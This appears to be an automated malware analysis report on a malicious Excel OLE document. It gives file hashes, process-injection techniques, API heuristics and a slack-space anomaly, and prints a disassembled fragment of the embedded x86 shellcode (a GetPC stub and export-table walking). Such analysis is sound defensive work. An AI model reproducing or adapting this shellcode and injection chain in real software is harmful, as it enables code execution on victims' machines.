Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 83567d18f7b5b092…

MALICIOUS

Office (OLE)

Size: 221.1 KB
Created: 2011-05-12 09:56:45
Authoring application: Microsoft Excel
First seen: 2017-12-09
MD5: 8224afcb9903593ecb7ccc1c6208bad2
SHA-1: 0d2f3af774e935072ca74514e5fc97da927f89d7
SHA-256: 83567d18f7b5b0927d42c333ab594dba1a863c7eaf6332d681aa0a268b5c87e8
Risk Score: 340

Malware Insights

MITRE ATT&CK
  • T1055 Process Injection
  • T1055.012 Process Hollowing

The file is an OLE document that exhibits characteristics of a malicious macro-enabled file. Heuristics indicate the use of Windows API functions such as WinExec, VirtualAlloc, WriteProcessMemory, CreateRemoteThread, and LoadLibrary, suggesting the sample attempts to inject and execute code within another process. The large slack space anomaly in the OLE structure further supports the possibility of hidden or packed malicious content.

Heuristics (8)

  • Reference to WriteProcessMemory API (severity: critical; rule: SC_STR_WRITEPROCESSMEMORY)
  • Reference to CreateRemoteThread API (severity: critical; rule: SC_STR_CREATEREMOTETHREAD)
  • x86 GetPC stub (CALL $+5; POP EAX) (severity: high; rule: SC_GETPC_CALL)
    Disassembly (attempted x86 opcode disassembly at the matched offset):
    00007D55  e800000000        call 0x7d5a
    00007D5A  58                pop eax
    00007D5B  83c005            add eax, 5
    00007D5E  c3                ret
    00007D5F  f3a4              rep movsb byte ptr es:[edi], byte ptr [esi]
    00007D61  33c0              xor eax, eax
    00007D63  8bcb              mov ecx, ebx
    00007D65  f3aa              rep stosb byte ptr es:[edi], al
    00007D67  6a00              push 0
    00007D69  ffd2              call edx
    00007D6B  50                push eax
    00007D6C  ffd5              call ebp
    00007D6E  8b4f14            mov ecx, dword ptr [edi + 0x14]
    00007D71  8b07              mov eax, dword ptr [edi]
    00007D73  8bd0              mov edx, eax
    00007D75  03d1              add edx, ecx
    00007D77  8b5f10            mov ebx, dword ptr [edi + 0x10]
    00007D7A  03d9              add ebx, ecx
    00007D7C  2bda              sub ebx, edx
    00007D7E  8b6e18            mov ebp, dword ptr [esi + 0x18]
    00007D81  8b561c            mov edx, dword ptr [esi + 0x1c]
    00007D84  8b7710            mov esi, dword ptr [edi + 0x10]
    00007D87  8b3f              mov edi, dword ptr [edi]
    00007D89  ffe4              jmp esp
    00007D8B  ff561c            call dword ptr [esi + 0x1c]
    00007D8E  6a00              push 0
    00007D90  ff5618            call dword ptr [esi + 0x18]
    00007D93  53                push ebx
    00007D94  55                push ebp
    00007D95  56                push esi
    00007D96  57                push edi
    00007D97  368b6c2418        mov ebp, dword ptr ss:[esp + 0x18]
    00007D9C  368b453c          mov eax, dword ptr ss:[ebp + 0x3c]
    00007DA0  368b540578        mov edx, dword ptr ss:[ebp + eax + 0x78]
    00007DA5  03d5              add edx, ebp
    00007DA7  3e8b4a18          mov ecx, dword ptr ds:[edx + 0x18]
    00007DAB  3e8b5a20          mov ebx, dword ptr ds:[edx + 0x20]
    00007DAF  03dd              add ebx, ebp
    00007DB1  e338              jecxz 0x7deb
    00007DB3  49                dec ecx
    00007DB4  3e                .byte 0x3e
  • Reference to WinExec API (severity: high; rule: SC_STR_WINEXEC)
  • Reference to LoadLibrary API (severity: high; rule: SC_STR_LOADLIBRARY)
  • Reference to GetProcAddress API (severity: high; rule: SC_STR_GETPROCADDRESS)
  • OLE document has large unaccounted-for region (severity: high; rule: OLE_SLACK_ANOMALY)
    OLE file is 226,404 bytes but its declared streams total only 29,612 bytes — 196,792 bytes (87%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Reference to VirtualAlloc API (severity: medium; rule: SC_STR_VIRTUALALLOC)